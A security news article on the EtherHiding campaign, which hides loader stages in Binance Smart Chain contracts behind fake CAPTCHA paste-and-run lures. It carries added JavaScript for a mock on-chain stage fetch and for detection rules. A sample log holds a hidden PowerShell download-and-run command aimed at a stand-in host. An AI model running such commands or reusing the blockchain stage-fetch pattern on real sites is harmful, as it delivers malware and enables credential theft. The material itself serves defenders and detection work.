EtherHiding: New Stealth Attack Hides Malware C2 in Binance Smart Chain Smart Contracts
Censys researchers have detailed a web-attack technique known as EtherHiding, in which attackers store the stages of a malicious loader inside smart contracts on the Binance Smart Chain test network and deliver them through counterfeit CAPTCHA pages. Instead of relying on conventional attacker-controlled staging servers, the delivery logic and its controls are moved onto the blockchain. Victims see a familiar "prove you're not a robot" prompt; behind it sits a scenario that coerces them into copying a command and running it on their own device. This fusion of decentralized infrastructure, social engineering and ClickFix (the lure pattern in which users launch the malware themselves by pasting a prepared command) makes attacker infrastructure hard to find and take down, and lets campaigns change course quickly.
EtherHiding reflects a larger trend: operators of web malware are increasingly abandoning fixed servers and single-use redirect chains in favor of decentralized platforms, where payloads can be swapped out quickly and without touching the compromised site. In this model the smart contract serves as both payload storage and control panel, while the victim's browser acts as a read-only blockchain client. A compromised website needs only a single, tiny JavaScript implant; from then on the attackers steer the campaign by sending cheap transactions that rewrite the contract's storage. Reading that storage costs nothing and needs no wallet, so the implant can poll it freely, and the website itself never has to be modified again.
Censys identified EtherHiding after observing a surge of fake CAPTCHA pages across multiple websites. These pages mimicked familiar “I’m not a robot” checks and carried a reCAPTCHA logo lifted from Wikimedia—yet were entirely fraudulent. Upon analysing one such site, researchers uncovered the EtherHiding chain: behind the counterfeit CAPTCHA lay an encrypted script that progressively unfolded into increasingly complex logic, preparing the browser to interact with blockchain smart contracts.
A multi-stage chain then began. First, the victim's browser requested data from smart contracts on the Binance Smart Chain test network. The contracts returned further script fragments, which were decrypted and executed in sequence. Early-stage code checked for automated analysis environments (sandboxes, headless browsers and other suspicious characteristics) and aborted if anything looked wrong, lowering the chance of detection and hindering analysis.
If the environment passed inspection, the chain branched by operating system: Windows and macOS each followed a separate path, delivered from their own smart contracts. A per-victim gate was also in play. The browser received a unique identifier, and the contracts used that ID to decide whether the next stage should be released. Operators could thus switch infections on or off for specific victims, throttle the campaign, or halt delivery altogether simply by changing on-chain data rather than touching code on the compromised sites. The same gate works against analysts: replaying the requests from a fresh environment with a new identifier may return nothing at all.
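The stage fetch and on-chain gate described in the two paragraphs above, as an added example that is not part of Censys's report or the implant's own code: a JavaScript sketch of the read-only JSON-RPC `eth_call` a browser would send to pull a stage out of a contract, the ABI decoding of the string that comes back, and a mock RPC transport that withholds the stage for victim IDs the operator has not switched on. The contract address, the function selector, the hypothetical `getStage(uint256)` getter, the victim IDs and the stage text are constructed placeholders, not real indicators.

```javascript
// Added example: how a browser-side implant can pull a payload stage out of a
// smart contract with one read-only eth_call, and how an analyst decodes the
// ABI-encoded string that comes back. Not Censys's code or the real implant.
// CONTRACT, SELECTOR, the getter name, the victim IDs and the stage text are constructed.

const CONTRACT = "0x" + "11".repeat(20);  // placeholder contract address
const SELECTOR = "0xdeadbeef";             // placeholder: first 4 bytes of keccak256 of the getter signature

// Left-pad a hex string (no 0x prefix) to one 32-byte ABI word.
function word(hex) {
  return hex.padStart(64, "0");
}

// Calldata for a hypothetical getStage(uint256 victimId): selector + one uint256 word.
function buildCalldata(victimId) {
  return SELECTOR + word(BigInt(victimId).toString(16));
}

// The JSON-RPC request body the browser would POST to an RPC endpoint.
function buildEthCall(victimId, id = 1) {
  return {
    jsonrpc: "2.0",
    id,
    method: "eth_call",
    params: [{ to: CONTRACT, data: buildCalldata(victimId) }, "latest"],
  };
}

// Decode a single ABI-encoded `string` return value: word 0 holds the offset of
// the string head, the word at that offset holds the byte length, and the bytes
// follow, right-padded to a 32-byte boundary.
function decodeAbiString(resultHex) {
  const hex = resultHex.startsWith("0x") ? resultHex.slice(2) : resultHex;
  const buf = Buffer.from(hex, "hex");
  if (buf.length < 64) throw new Error("return data too short for a string");
  const offset = Number(BigInt("0x" + buf.subarray(0, 32).toString("hex")));
  if (offset + 32 > buf.length) throw new Error("string offset points outside return data");
  const length = Number(BigInt("0x" + buf.subarray(offset, offset + 32).toString("hex")));
  const start = offset + 32;
  if (start + length > buf.length) throw new Error("string length exceeds return data");
  return buf.subarray(start, start + length).toString("utf8");
}

// Encode a string the way a Solidity getter returns it (used only to build the mock reply).
function encodeAbiString(s) {
  const data = Buffer.from(s, "utf8");
  const padded = Math.ceil(data.length / 32) * 32;
  return "0x" + word("20") + word(data.length.toString(16)) +
    data.toString("hex").padEnd(padded * 2, "0");
}

// Constructed on-chain state: only victim 42 is currently gated "on".
// An empty string models the contract withholding the next stage.
const MOCK_CHAIN_STATE = new Map([
  [42n, "/* stage 2 */ console.log('next stage')"],
]);

// Mock transport standing in for fetch(): parses the uint256 argument out of
// the calldata and answers like a contract whose gate checks the victim ID.
function mockRpc(request) {
  const victimId = BigInt("0x" + request.params[0].data.slice(SELECTOR.length));
  const stage = MOCK_CHAIN_STATE.get(victimId) ?? "";
  return { jsonrpc: "2.0", id: request.id, result: encodeAbiString(stage) };
}

// What the implant does per stage: call, decode, and (in the real thing) execute.
function fetchStage(victimId, transport = mockRpc) {
  const reply = transport(buildEthCall(victimId));
  return decodeAbiString(reply.result);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(buildEthCall(42)));
  console.log("victim 42 ->", JSON.stringify(fetchStage(42)));
  console.log("victim 7  ->", JSON.stringify(fetchStage(7)));
}
```

The selector is the first four bytes of keccak256 over the getter's signature; Node has no keccak in its standard library, so the constant above is a placeholder. What is worth alerting on at the wire is already visible in `buildEthCall`: an ordinary web page POSTing a JSON body with `"method":"eth_call"` to an RPC host, with no wallet involved because reads are free. An empty decoded stage is also the signature of the gate: a fresh victim ID gets nothing, which is why a replay from an analysis box can come back empty.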
The next stage involved direct interaction with the user. A full-screen fake CAPTCHA appeared above the legitimate site, displaying familiar prompts instructing the user to "confirm you are human" and follow a few simple steps. The crucial step was to press a copy button and then paste the clipboard contents into Terminal on macOS or the Run dialog (Win+R) on Windows. By this point the browser had already placed a malicious command on the clipboard, which the user launched under the illusion of completing a verification check.
On macOS, this installed a malicious component that persisted on the system and spawned an agent responsible for data theft, command-and-control communication and execution of attacker instructions. The Windows branch worked similarly: the pasted command drove built-in system tools to fetch and execute the malware. To defensive tooling the activity looked user-initiated and legitimate, which complicates detection.
Researchers also described how the macOS branch selects its command-and-control (C2) domain dynamically, a dead-drop resolver pattern. The agent queries Telegram and Steam pages, extracts specific text and derives a domain name from it. If the resulting domain responds correctly, it becomes the active C2 endpoint. Operators can therefore rotate infrastructure simply by editing public-facing text on mainstream platforms, without altering the malware itself. Because the dead drops sit on widely used services, blocking them at the network edge is rarely practical; the more useful signal is an unexpected process on the endpoint fetching those pages.
Once connected to C2, the macOS agent becomes a full stealer and synchronization client. It gathers user and device data, transmits it to the operator, and attempts to harvest the local account password using fake system dialogs that closely mimic legitimate macOS prompts requesting credentials to "modify settings". Believing the dialog to be genuine, victims enter their password, which the malware validates, stores and forwards. The agent watches for password changes and repeats the ruse when necessary, while continuously collecting detailed system information (software, hardware, display parameters), ultimately building a comprehensive device "passport" together with current login credentials.
The final layer is a persistent control channel. At regular intervals, the agent polls the C2 server for tasks. Any issued command is executed silently in the background, turning the device into a durable backdoor capable of data theft, arbitrary command execution, and persistent oversight of the victim’s local account.
From an infrastructure standpoint, EtherHiding diverges sharply from older campaigns like SocGholish. Whereas earlier threats relied on constantly shifting domains and servers, EtherHiding shifts its centre of gravity into the blockchain. A single injected script can linger on countless websites for years, while only the smart contract contents change to control delivery stages.
The campaign nevertheless leaves distinct fingerprints that Censys uses to detect it. On ordinary, non-crypto websites, blockchain-interaction libraries are exceptionally rare; their sudden appearance, combined with a reCAPTCHA logo hotlinked from Wikimedia, is a strong indicator. From 21 October to 20 November alone, Censys observed between 1,403 and 1,671 sites per day hosting fake CAPTCHA pages across multiple campaigns, roughly 1,549 per day on average. EtherHiding accounts for only a slice of this activity, but its blend of blockchain hosting, fake CAPTCHA pages and ClickFix makes it conspicuously sophisticated.
Researchers emphasize that fake CAPTCHA pages, blockchain hosting and ClickFix are each dangerous in isolation; their combination magnifies the threat. For defenders, this case illustrates the accelerating evolution of web-based threats. On endpoints, security teams should take notice when users report opening a terminal, running a pasted command, or meeting an unexpected password prompt after interacting with a suspicious CAPTCHA page. On Windows, a command interpreter or script host launched from the Run dialog (and therefore parented by explorer.exe) seconds after code was copied from a browser is particularly telling.
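The Windows endpoint tell described above, as an added detection example that is not Censys's logic: a correlation rule over Sysmon-style process-creation events that reports a command interpreter or script host started from the Run dialog (parent explorer.exe) within a short window after browser activity, with a download-and-run style command line. The event shape, the process lists, the regexes, the 60-second window and the sample log are assumptions constructed for this example.

```javascript
// Added example, not Censys's detection logic: flag the Windows ClickFix tell
// by correlating process-creation events. Event shape, process lists, regexes,
// the time window and the sample log are all constructed assumptions.

const BROWSERS = new Set(["chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"]);
const RUN_TARGETS = new Set([
  "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
  "cscript.exe", "rundll32.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
]);
const WINDOW_MS = 60 * 1000;  // assumed: the paste-and-run follows the copy within a minute

// Command-line fragments typical of paste-and-run lures (download, decode, run, stay hidden).
const SUSPICIOUS_ARGS = [
  /\biwr\b/i, /invoke-webrequest/i, /\biex\b/i, /invoke-expression/i,
  /\s-e(nc|ncodedcommand)?\s/i, /mshta\s+https?:/i, /\bcurl\b[^|]*\|/i,
  /-w(indowstyle)?\s+hidden/i,
];

// events: [{ ts: ISO 8601 string, image, parent, cmdline }], one per process creation.
// Returns the launches that match the rule, each with the number of matched fragments.
function findClickFixLaunches(events) {
  const sorted = [...events].sort((a, b) => Date.parse(a.ts) - Date.parse(b.ts));
  const hits = [];
  let lastBrowser = null;  // time of the most recent browser process event
  for (const e of sorted) {
    const t = Date.parse(e.ts);
    const image = e.image.toLowerCase();
    // Browser child processes (renderers, GPU, utilities) spawn constantly, so
    // their creation serves here as a cheap proxy for "the browser was in use".
    if (BROWSERS.has(image)) { lastBrowser = t; continue; }
    // Run-dialog launches are parented by explorer.exe; skip everything else.
    if (e.parent.toLowerCase() !== "explorer.exe") continue;
    if (!RUN_TARGETS.has(image)) continue;
    const matched = SUSPICIOUS_ARGS.filter((re) => re.test(e.cmdline));
    const afterBrowser = lastBrowser !== null && t - lastBrowser <= WINDOW_MS;
    if (afterBrowser && matched.length > 0) {
      hits.push({ ts: e.ts, image: e.image, cmdline: e.cmdline, score: matched.length });
    }
  }
  return hits;
}

// Constructed sample log: one lure-style launch, one benign Run-dialog use long
// after any browser activity, and one non-explorer child that is out of scope.
const SAMPLE_EVENTS = [
  { ts: "2025-11-05T10:00:00Z", image: "chrome.exe", parent: "chrome.exe",
    cmdline: "chrome.exe --type=renderer" },
  { ts: "2025-11-05T10:00:21Z", image: "powershell.exe", parent: "explorer.exe",
    cmdline: "powershell -w hidden -c \"iwr http://example.invalid/a.txt | iex\"" },
  { ts: "2025-11-05T10:30:00Z", image: "cmd.exe", parent: "explorer.exe",
    cmdline: "cmd /c dir" },
  { ts: "2025-11-05T10:31:00Z", image: "powershell.exe", parent: "powershell.exe",
    cmdline: "powershell -c \"iwr http://example.invalid/b.txt | iex\"" },
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(findClickFixLaunches(SAMPLE_EVENTS), null, 2));
}
```

In production the browser-activity proxy would come from foreground-window or clipboard telemetry rather than process creation, and the command-line patterns need tuning against the environment's own admin tooling to keep false positives down. The explorer.exe parent is the sturdiest part of the rule: Run-dialog launches normally carry it, while scripted, scheduled or installer-driven launches almost never do.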
On the network and web side, defenders should watch for large encoded script blocks, long decoding chains and unexpected blockchain-related libraries on sites unrelated to cryptocurrency. After any suspected interaction with such fake CAPTCHA pages, experts recommend enforcing multi-factor authentication and rotating passwords, since the chain relies heavily on stealers and credential-harvesting components; because stealers typically also take browser session cookies, active sessions should be revoked as well.
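The page-level fingerprints described in the two paragraphs above (blockchain libraries and RPC hosts on a non-crypto site, a reCAPTCHA logo hotlinked from Wikimedia, keyboard lures, long encoded blobs and decoding chains), as an added scoring example that is not Censys's detection logic: a JavaScript scorer run over two constructed HTML pages. The indicator patterns, weights, thresholds and both sample pages are assumptions made for this example and are not published indicators of compromise.

```javascript
// Added example, not Censys's detection logic: score an HTML document for
// EtherHiding-style fingerprints. Patterns, weights, thresholds and the two
// sample pages are constructed for this example and are not published IOCs.

const INDICATORS = [
  { name: "blockchain-library", weight: 3,
    re: /web3(\.min)?\.js|ethers(\.min)?\.js|new\s+Web3\s*\(|JsonRpcProvider|window\.ethereum/i },
  { name: "bsc-rpc-endpoint", weight: 3,
    re: /data-seed-prebsc|bsc-dataseed|bsc-testnet|binance\.org:8545/i },
  { name: "json-rpc-eth_call", weight: 2, re: /["']eth_call["']/ },
  { name: "wikimedia-recaptcha-logo", weight: 3,
    re: /upload\.wikimedia\.org\/[^"'\s]*recaptcha/i },
  { name: "keyboard-paste-lure", weight: 2,
    re: /win(dows)?\s*(key)?\s*\+\s*r\b|ctrl\s*\+\s*v\b|open\s+(the\s+)?terminal/i },
  { name: "long-encoded-blob", weight: 2, re: /[A-Za-z0-9+\/]{300,}={0,2}/ },
];
// Decoding primitives; three or more on one page suggest a multi-stage unpacker.
const DECODER_RE = /\b(atob|eval|Function|fromCharCode|decodeURIComponent|unescape)\s*\(/g;

// Returns { score, hits, verdict }. Pass cryptoSite: true for sites where a
// blockchain library is expected, so that indicator alone does not fire there.
function scoreHtml(html, { cryptoSite = false } = {}) {
  const hits = [];
  let score = 0;
  for (const ind of INDICATORS) {
    if (cryptoSite && ind.name === "blockchain-library") continue;
    if (ind.re.test(html)) { hits.push(ind.name); score += ind.weight; }
  }
  const decoders = (html.match(DECODER_RE) || []).length;
  if (decoders >= 3) { hits.push(`decoding-chain(${decoders})`); score += 2; }
  const verdict = score >= 6 ? "likely-etherhiding" : score >= 3 ? "review" : "clean";
  return { score, hits, verdict };
}

// Constructed sample of a page carrying the implant and the lure. The blob is
// just base64 of 300 "x" bytes standing in for an encoded stage.
const SUSPECT_PAGE = `<html><body>
<img src="https://upload.wikimedia.org/wikipedia/commons/x/y/RecaptchaLogo.svg" alt="reCAPTCHA">
<div id="verify">Press Windows + R, then Ctrl + V and hit Enter to confirm you are human</div>
<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
var rpc = "https://data-seed-prebsc-1-s1.binance.org:8545";
var blob = "${Buffer.from("x".repeat(300)).toString("base64")}";
var s1 = atob(blob); var s2 = String.fromCharCode(s1.charCodeAt(0)); eval(s1);
</script></body></html>`;

// Constructed sample of an ordinary page with no such fingerprints.
const CLEAN_PAGE = `<html><body><h1>Weekly recipes</h1>
<script src="/static/app.js"></script>
<script>document.title = "Weekly recipes";</script></body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(scoreHtml(SUSPECT_PAGE)));
  console.log(JSON.stringify(scoreHtml(CLEAN_PAGE)));
}
```

The weights are deliberately coarse; the point is the combination. A blockchain library on a DeFi dashboard is expected, which is what the `cryptoSite` switch models, and a long base64 blob on its own is common in legitimate bundles. A Wikimedia-hosted reCAPTCHA logo plus an RPC host for a BSC network plus an atob/eval chain on a recipe blog is what should page someone.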
EtherHiding makes one reality starkly clear: blockchain is becoming a convenient tool for attackers not only for financial operations but also for covert delivery and dynamic updating of malicious chains. Even in decentralized environments, adversaries leave identifiable digital traces — the question is whether defenders are prepared to search for them in unfamiliar places.